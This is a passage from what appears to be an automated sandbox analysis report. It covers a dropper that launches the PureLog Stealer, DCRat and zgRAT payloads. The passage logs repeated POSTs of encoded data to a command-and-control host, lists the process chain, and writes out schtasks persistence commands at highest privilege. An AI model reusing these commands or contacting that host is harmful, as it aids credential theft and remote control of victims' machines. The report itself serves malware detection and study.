                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192.168.2.449820185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:09.772655010 CET308OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:10.125345945 CET344OUTData Raw: 05 05 01 02 06 01 01 06 05 06 02 01 02 0d 01 04 00 07 05 01 02 02 03 0c 07 05 0f 0d 06 01 00 05 0f 00 05 09 01 03 06 07 0c 05 02 01 05 54 02 03 03 03 0e 0f 0e 07 01 06 01 0e 04 06 07 0b 00 0c 05 0b 0a 00 04 56 05 03 0e 57 0d 02 0a 00 0b 03 06 01
                                                  Data Ascii: TVW\L~C|Nq\`ab\vewSBf\cRsX|MUY{lcHxNfKCPwY|Nie~V@{Cf~\a
                                                  Jan 2, 2025 07:43:10.406136990 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:10.542355061 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8192.168.2.449841185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:12.777729034 CET326OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:13.124891043 CET344OUTData Raw: 05 06 01 07 06 0f 01 07 05 06 02 01 02 03 01 04 00 0a 05 0f 02 0c 03 08 00 53 0a 00 06 01 01 54 0f 52 07 0b 02 03 04 07 0d 03 06 03 06 04 06 00 04 53 0c 5a 0f 50 05 00 06 0f 04 06 07 02 06 0c 01 04 0d 01 04 0f 05 06 0b 02 0c 01 0c 02 0b 05 04 07
                                                  Data Ascii: STRSZPSWRU\L~pztrSLvSyw|h`tK{|UKoY~}~h`Y^}e~V@{C\rq
                                                  Jan 2, 2025 07:43:13.413958073 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:13.542433023 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192.168.2.449859185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:15.270199060 CET273OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:15.624830008 CET344OUTData Raw: 05 06 04 0c 06 0c 04 05 05 06 02 01 02 02 01 00 00 01 05 09 02 05 03 01 00 00 0c 05 04 55 03 55 0f 55 06 01 02 51 03 07 0f 0b 05 50 00 01 04 0e 05 02 0b 0e 0a 0f 04 52 04 53 06 50 06 55 07 01 02 07 0d 0c 04 06 07 06 0e 04 0b 05 0f 04 0e 01 05 53
                                                  Data Ascii: UUUQPRSPUSTWR\L}Sk^Tvquv\`~luBv|c|olcx`PC`wdhi_~V@xC~N}b[
                                                  Jan 2, 2025 07:43:15.897964001 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:16.030421019 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192.168.2.449995185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:37.214448929 CET309OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:37.562329054 CET344OUTData Raw: 05 01 04 00 06 0c 04 07 05 06 02 01 02 06 01 03 00 00 05 0d 02 04 03 0b 00 53 0c 0c 06 0f 00 09 0c 02 05 01 02 03 04 57 0b 04 05 01 00 07 07 04 07 02 0d 0a 0e 01 06 02 06 07 05 05 05 52 06 0c 01 0a 0e 0a 06 06 05 51 0b 03 0e 55 0c 0c 0d 05 05 53
                                                  Data Ascii: SWRQUSPQ\L~NfOt[qv\p@}clU^~soZy|dYlNPI|}wQvgo_j_~V@Bx}z}r}
                                                  Jan 2, 2025 07:43:37.850827932 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:37.978218079 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:34 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192.168.2.450013185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:45.319977999 CET326OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:45.671842098 CET344OUTData Raw: 05 02 04 0c 03 0b 04 06 05 06 02 01 02 01 01 02 00 02 05 0c 02 0c 03 0b 07 04 0f 06 03 0f 03 06 0f 05 06 01 00 0c 03 02 0c 56 07 03 05 0b 04 00 06 06 0b 00 0c 05 07 00 04 0f 06 50 07 07 06 00 01 03 0f 00 05 03 07 02 0f 03 0b 06 0c 02 0c 03 02 03
                                                  Data Ascii: VPRQT\L}UpvOwr~\bvl@hBb\wB|~swYl|UHop~}^ww`~e~V@xmrr}
                                                  Jan 2, 2025 07:43:45.975331068 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:46.106070995 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192.168.2.450014185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:48.648454905 CET326OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:48.999847889 CET344OUTData Raw: 05 05 04 0d 06 0a 01 00 05 06 02 01 02 04 01 01 00 06 05 0f 02 0d 03 09 01 01 0a 06 05 02 01 50 0f 56 04 01 03 04 07 00 0e 57 02 0b 07 01 04 02 05 03 0f 01 0a 05 04 52 01 07 03 05 06 01 04 01 01 0b 0e 0b 07 54 04 08 0e 00 0b 0f 0c 0d 0c 06 02 00
                                                  Data Ascii: PVWRTUV\L~|N~@vr_uv||v]`Rtk]oYyolYbJh~pNc^hj_~V@@xSbbu
                                                  Jan 2, 2025 07:43:49.285562038 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:49.418426991 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192.168.2.450015185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:52.273149967 CET309OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:52.624927998 CET344OUTData Raw: 00 02 01 01 06 0a 01 01 05 06 02 01 02 03 01 05 00 01 05 0b 02 04 03 00 01 0f 0e 0c 07 01 00 06 0f 02 06 09 02 00 04 04 0f 06 07 0a 00 07 06 00 03 00 0d 09 0f 00 01 06 04 04 06 07 01 05 06 08 00 07 0c 0b 04 56 06 08 0f 07 0e 00 0e 0c 0c 55 05 0c
                                                  Data Ascii: VUZWU\L}R|c~@cqb]wupBkRaM`Bh~`tKxR{{^_Xh}^@cwliO~V@{S~L}rW
                                                  Jan 2, 2025 07:43:52.908746004 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:53.042171001 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:01:41:56
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\t8F7Ic986c.exe"
                                                  Imagebase:0x7ff652ed0000
                                                  File size:7'204'705 bytes
                                                  MD5 hash:A4923D4DB3234B3905AD3097CC03AF46
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\t8F7Ic986c.exe"
                                                  Imagebase:0x7ff652ed0000
                                                  File size:7'204'705 bytes
                                                  MD5 hash:A4923D4DB3234B3905AD3097CC03AF46
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:01:41:57
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                                                  Imagebase:0x7ff6c0350000
                                                  File size:2'117'940 bytes
                                                  MD5 hash:B0A28FF93B030B10FD70698A5A7C27D0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 57%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:01:41:58
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:01:41:58
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:01:41:58
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.sfx.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:Chaindriver.sfx.exe -p1234
                                                  Imagebase:0x7ff720b30000
                                                  File size:1'903'066 bytes
                                                  MD5 hash:9E935AF26F27628601A2A336CA24AEF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 18%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:01:41:59
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Chaindriver.exe"
                                                  Imagebase:0x660000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 70%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 12 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
                                                  Imagebase:0x7ff70e260000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:01:42:02
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
